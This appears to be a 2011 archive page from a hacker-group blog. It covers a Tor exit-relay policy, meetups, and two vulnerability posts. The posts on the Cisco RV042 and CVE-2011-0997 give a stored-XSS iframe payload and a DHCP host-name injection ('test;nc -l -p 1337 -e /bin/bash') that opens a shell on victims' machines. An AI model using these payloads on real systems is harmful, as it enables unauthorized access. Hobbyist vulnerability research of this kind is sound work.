Defend Online Anonymity – Set Up a Tor Relay

Posted on June 7, 2011 by AnarchyAngel

Got this in a email from the good people over at EFF:

Dear Anarchy,
We use Tor to access our website and to publish to our blog, which is blocked inside of our country. — Iranian human rights activist
If you could do something to make the Internet safer and more private for activists, investigative journalists, and humanitarian aid workers around the world, would you?

You can.

Today EFF is launching the Tor Challenge—a campaign to encourage Internet users all over the world to support the Tor network by operating relays.

Tor is a service that helps you to protect your anonymity while using the Internet and allows you to circumvent Internet censorship. When you use the Tor software, your real IP address remains hidden. Activists all over the world depend on Tor to maintain anonymity when communicating and accessing websites that have been blocked by their governments.

The Tor software depends on the Tor network, which is made up of Tor relays operated by individuals like you. The more Tor relays we have running, the faster, more secure and more robust the Tor network becomes.

Are you ready to help Internet activists all over the world?

Click here to see how and learn more.
Defending your digital rights,

The EFF Activism Team

This is a great idea and more ppl should run tor exit relays, but it does not come with out some pains. I kept on getting DMCA notices so i had to employ a few exit policy rules on my relay. Here is the ones im using.

ExitPolicy accept *:20-23 # FTP, SSH, telnet ExitPolicy accept *:43 # WHOIS ExitPolicy accept *:53 # DNS ExitPolicy accept *:79-81 # finger, HTTP ExitPolicy accept *:88 # kerberos ExitPolicy accept *:110 # POP3 ExitPolicy accept *:143 # IMAP ExitPolicy accept *:194 # IRC ExitPolicy accept *:220 # IMAP3 ExitPolicy accept *:443 # HTTPS ExitPolicy accept *:464-465 # kpasswd, SMTP over SSL ExitPolicy accept *:543-544 ExitPolicy accept *:563 # NNTP over SSL ExitPolicy accept *:587 # SMTP ExitPolicy accept *:706 ExitPolicy accept *:749 # kerberos ExitPolicy accept *:873 # rsync ExitPolicy accept *:902-904 ExitPolicy accept *:981 ExitPolicy accept *:989-995 # FTP over SSL, Netnews Administration System, telnets, IMAP over SSL, ircs, POP3 over SSL ExitPolicy accept *:1194 # openvpn ExitPolicy accept *:1220 # QT Server Admin ExitPolicy accept *:1293 # PKT-KRB-IPSec ExitPolicy accept *:1500 # VLSI License Manager ExitPolicy accept *:1723 # PPTP ExitPolicy accept *:1863 # MSNP ExitPolicy accept *:2082-2083 # Radius ExitPolicy accept *:2086-2087 # GNUnet, ELI ExitPolicy accept *:2095-2096 # NBX ExitPolicy accept *:3128 # SQUID ExitPolicy accept *:3389 # MS WBT ExitPolicy accept *:3690 # SVN ExitPolicy accept *:4321 # RWHOIS ExitPolicy accept *:4643 ExitPolicy accept *:5050 # MMCC ExitPolicy accept *:5190 # ICQ ExitPolicy accept *:5222-5223 # XMPP, XMPP over SSL ExitPolicy accept *:5900 # VNC ExitPolicy accept *:6666-6667 #IRC ExitPolicy accept *:6679 ExitPolicy accept *:6697 ExitPolicy accept *:8000 # iRDMI ExitPolicy accept *:8008 ExitPolicy accept *:8080 # HTTP Proxies ExitPolicy accept *:8087-8088 # Simplify Media SPP Protocol, Radan HTTP ExitPolicy accept *:8443 # PCsync HTTPS ExitPolicy accept *:8888 # HTTP Proxies, NewsEDGE ExitPolicy accept *:9418 # git ExitPolicy accept *:9999 # distinct ExitPolicy accept *:10000 # Network Data Management Protocol ExitPolicy accept *:19638 ExitPolicy reject *:*

So anyway, yes everyone should run a tor relay and should also use the above for your tor relay config. On ubuntu boxes just search for ExitPolicy in /etc/tor/torrc and past it in. Be sure to comment out any pre-existing exit policies. Ok go set up a tor exit relay already!!

Know your rights event!!

Posted on May 31, 2011 by AnarchyAngel

dc414 is proud to produce the “Know your rights event” on July 1st 2011 at Candlelight Collective. The goal of this event is to educate the people and teach them how they can preserve their civil liberties during police encounters with confidence. The event will start with a viewing of the 40 minute film “10 Rules for Dealing with Police” from FlexYourRights.org followed by a few words from Waring R. Fincke attorney at law. After which there will be time for any questions the audience might have.

Help us spread the word! Download this flyer, make copies and post them around!

More info HERE

Cisco Small Business RV042 XSS

Posted on May 20, 2011 by AnarchyAngel

The RV042 is a Dual WAN, 4 port switch, VPN Router. Work just got it in to do a little load balancing and for fail over protection. One of my favorite things to do with new toys like this guy is give them a nice once over. Which of course is how i found a XSS in the login logging functions of this device. I was originally looking for weaknesses in the login scheme and notice that my attempts are being logged, notably the user name i was trying to login as was being logged, along with a brief description of the failure. I then put non-standard characters in there which broke the UI, after some more playing around i found i was able to get html to render, from there i just started messing with XSS payloads till i found one that worked.

Here is my working XSS at the login screen:
The string i used is < iframe src="https://new.dc414.org" > For password i just put in some junk

Here is what it looks like after i submit:

Here is the XSS in action 🙂

K thats it, enjoy, peace.

New meeting spot: Brewing Grounds for Change

Posted on May 17, 2011 by AnarchyAngel

We have switched places again, but i hope for the last time. The new venue is Brewing Grounds for Change on Farwell Avenue. For directions or more info check out the Meetings page. Another new thing we are starting is we are asking people that plan on coming to meetings to bring $5 or a non-perishable food item. The money will go toward paying for prizes “the ones we give away at meetings/events”, events and other stuff dc414. The food will go to the food pantry 🙂 We will see you at the next meeting!

ngharo the JQuery champ!

Posted on May 13, 2011 by AnarchyAngel

A big congrats to ngharo for being named JQuery champ by jquery.org!! He got recognized for his hours of idling in #jquery and helping out n00bies “yeah dude has too much time on his hands i know” 🙂 Every one give ngh a big round of applause and a pat on the back for being so 1337. Keep up the good work brother!

May 2011 meeting

Posted on May 9, 2011 by AnarchyAngel

Another awesome meeting with dc414 this month. dw5304 pwned us all with his GPS jammer, and a ardunio RFID reader. The laser mic from last months meeting was busted out for a while and ngharo brought his oscilloscope which we used to mess with the RFID reader. Vladimir had some killer lasers, one of which we used to light a cig 😀 Check out the vids below to see some of the fun 🙂

The laser lighter – https://www.youtube.com/watch?v=FRFPO2X-Mao

Ardunio RFID reader demo – https://www.youtube.com/watch?v=PfCxP5Huoxw

oscilloscope + RFID play time – https://www.youtube.com/watch?v=4c5NK9idhtA

New meeting place for dc414.

Posted on April 20, 2011 by AnarchyAngel

We will be holding the next dc414 at a new location. See the meetings page for more info on the location. It should be a more hacker friendly place and it has tons more space for us to move around in. Be sure to come hang out with the dc414 crew, do some hacking and get a chance to win free junk from dc414!! See you there!!

THOTCON 0x2 = good times

Posted on April 16, 2011 by AnarchyAngel

Well THOTCON was killer this year! Loved most of the talks and really loved the swag! While the villages was a little week i did see a few cool locks and one interesting anonymous wireless multi AP setup “i wish i took a pic of it :(“. Here is a few pics from the con and of the swag. I will have more content to upload later.
THOTCON badge

Fun with CVE-2011-0997

Posted on April 12, 2011 by AnarchyAngel

Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine 😀

What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.

Good times @ mke makerspace open house

Posted on April 10, 2011 by AnarchyAngel

Me and ngh made a trip to mke makerspace’s open house and man it was well worth the ride. Got to see lots of cool clocks 😀 make a little blinking LED in soldering class, watched a makerbot in action and tons more awesome stuff. Also thanx to makerspace we also have a nice DIY project to give away at the next dc414 meeting “the blinky light we made in soldering class” Heres some pics i took while there. Thats it, peace.
mke makerspace